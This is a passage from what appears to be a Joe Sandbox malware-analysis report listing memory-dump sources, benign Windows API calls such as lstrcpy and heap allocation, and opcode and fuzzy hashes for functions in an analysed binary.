                           • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy
                          • String ID:
                          • API String ID: 3722407311-0
                          • Opcode ID: 47af731740e7c5dc5444f30753c3d6b6b6d888db01a349294b11491eb90bdfec
                          • Instruction ID: 3abb6d6e59dcdfcb239c260beccc25cee2bc4f0c912ea37e320894acaae231ec
                          • Opcode Fuzzy Hash: 47af731740e7c5dc5444f30753c3d6b6b6d888db01a349294b11491eb90bdfec
                          • Instruction Fuzzy Hash: AD121E70A022218FDB2ACF19C554B65B7E4BF45718B1AC0AEE909CB7A1D772ED42CF40
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 003B7C94
                          • std::_Xinvalid_argument.LIBCPMT ref: 003B7CAF
                            • Part of subcall function 003B7D40: std::_Xinvalid_argument.LIBCPMT ref: 003B7D58
                            • Part of subcall function 003B7D40: std::_Xinvalid_argument.LIBCPMT ref: 003B7D76
                            • Part of subcall function 003B7D40: std::_Xinvalid_argument.LIBCPMT ref: 003B7D91
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                           • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Xinvalid_argumentstd::_
                          • String ID: string too long
                          • API String ID: 909987262-2556327735
                          • Opcode ID: 98773cf5fba7b9268b2aa7563d061846b132ce700f6bf58dc9147b4b55d1dee5
                          • Instruction ID: 4b810c1fb9a169d0145b23ce87ad87e4023f5db1f14fa17ef255c7eb56069bb9
                          • Opcode Fuzzy Hash: 98773cf5fba7b9268b2aa7563d061846b132ce700f6bf58dc9147b4b55d1dee5
                          • Instruction Fuzzy Hash: 16310B723086144BD736DD6CE8809AAFBE9DFD1758B21462FF646CBE41C7719C418394
                          APIs
                          • GetProcessHeap.KERNEL32(00000008,?), ref: 003A6F74
                          • RtlAllocateHeap.NTDLL(00000000), ref: 003A6F7B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                           • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcess
                          • String ID: @
                          • API String ID: 1357844191-2766056989
                          • Opcode ID: f8da4bc4a83bd3a811a051bdf15119e909eca2ae04225e41fa42f14c3ef5cca1
                          • Instruction ID: 1d601e5f5870242b1b3877a353fef1648872210b148151bdb5f38178124714ce
                          • Opcode Fuzzy Hash: f8da4bc4a83bd3a811a051bdf15119e909eca2ae04225e41fa42f14c3ef5cca1
                          • Instruction Fuzzy Hash: 7521AE716006018FEB218B20DC8ABB673E8EB42700F484978F956CB684E7B4E945C750
                          APIs
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003C244C
                          • lstrlen.KERNEL32(00000000), ref: 003C24E9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003C2570
                          • lstrlen.KERNEL32(00000000), ref: 003C2577
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                           • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: 2ef64c5766caaf284d02bc90541dd5835231465c7263e89001d118f624503f45
                          • Instruction ID: 9ee54770ce703603535d8d83619ea0b6cd5c8a51a50b7dd2eb33ecf8cd8ec77b
                          • Opcode Fuzzy Hash: 2ef64c5766caaf284d02bc90541dd5835231465c7263e89001d118f624503f45
                          • Instruction Fuzzy Hash: 6481BEB0E002069BDB15DB99DC44FAFB7B5AB95300F18806DE908EB281EB759D46CB94
                          APIs
                            • Part of subcall function 003A1610: lstrcpy.KERNEL32(00000000), ref: 003A162D
                            • Part of subcall function 003A1610: lstrcpy.KERNEL32(00000000,?), ref: 003A164F
                            • Part of subcall function 003A1610: lstrcpy.KERNEL32(00000000,?), ref: 003A1671
                            • Part of subcall function 003A1610: lstrcpy.KERNEL32(00000000,?), ref: 003A1693
                          • lstrcpy.KERNEL32(00000000,?), ref: 003A1557
                          • lstrcpy.KERNEL32(00000000,?), ref: 003A1579
                          • lstrcpy.KERNEL32(00000000,?), ref: 003A159B
                          • lstrcpy.KERNEL32(00000000,?), ref: 003A15FF
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                           • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy
                          • String ID:
                          • API String ID: 3722407311-0
                          • Opcode ID: 81e8c81cc4692ba70bf398e7a8ed7cd20faee30b9744219f8170605c8ee420c2
                          • Instruction ID: 190d232eea561456f0100617e9c91235d47006f476e140e246ac847506106da9
                          • Opcode Fuzzy Hash: 81e8c81cc4692ba70bf398e7a8ed7cd20faee30b9744219f8170605c8ee420c2
                          • Instruction Fuzzy Hash: 7A31A275A11B029FC725DF7AC588957BBE5FF8A705B05492EA896C7B10DB30F811CB80
                          APIs
                          • lstrcpy.KERNEL32(00000000), ref: 003C15A1
                          • lstrcpy.KERNEL32(00000000,?), ref: 003C15D9
                          • lstrcpy.KERNEL32(00000000,?), ref: 003C1611
                          • lstrcpy.KERNEL32(00000000,?), ref: 003C1649
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                           • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy
                          • String ID:
                          • API String ID: 3722407311-0
                          • Opcode ID: 46e4edcbcf8bb7fd75b1295affbbb66ce908598d47d3182ef7f7bb689d9bb223
                          • Instruction ID: 7f3886ff216cc917f36107378d1212be8bbabb7350987f77bea70d1cf275a144
                          • Opcode Fuzzy Hash: 46e4edcbcf8bb7fd75b1295affbbb66ce908598d47d3182ef7f7bb689d9bb223
                          • Instruction Fuzzy Hash: 1221F774601B028BD736DF6AD858F17B7F4EF46700B04491DA886C7A41EB30EC11DB90
                          APIs
                          • lstrcpy.KERNEL32(00000000), ref: 003A162D
                          • lstrcpy.KERNEL32(00000000,?), ref: 003A164F
                          • lstrcpy.KERNEL32(00000000,?), ref: 003A1671
                          • lstrcpy.KERNEL32(00000000,?), ref: 003A1693
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                           • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy
                          • String ID:
                          • API String ID: 3722407311-0
                          • Opcode ID: d3a4a7944db3ac43f678f072883832ce1e956cc4a90f3d23a1f77df458418cdb
                          • Instruction ID: 54e6bd68ed43e0b4f8569e1b5c9e3c18c795e844e9d776e09428b89b4ded2cc7
                          • Opcode Fuzzy Hash: d3a4a7944db3ac43f678f072883832ce1e956cc4a90f3d23a1f77df458418cdb
                          • Instruction Fuzzy Hash: C3115274A12B039BDB259F79D40C927B7F8FF46701B09052EA896C7B50EB30E811CB90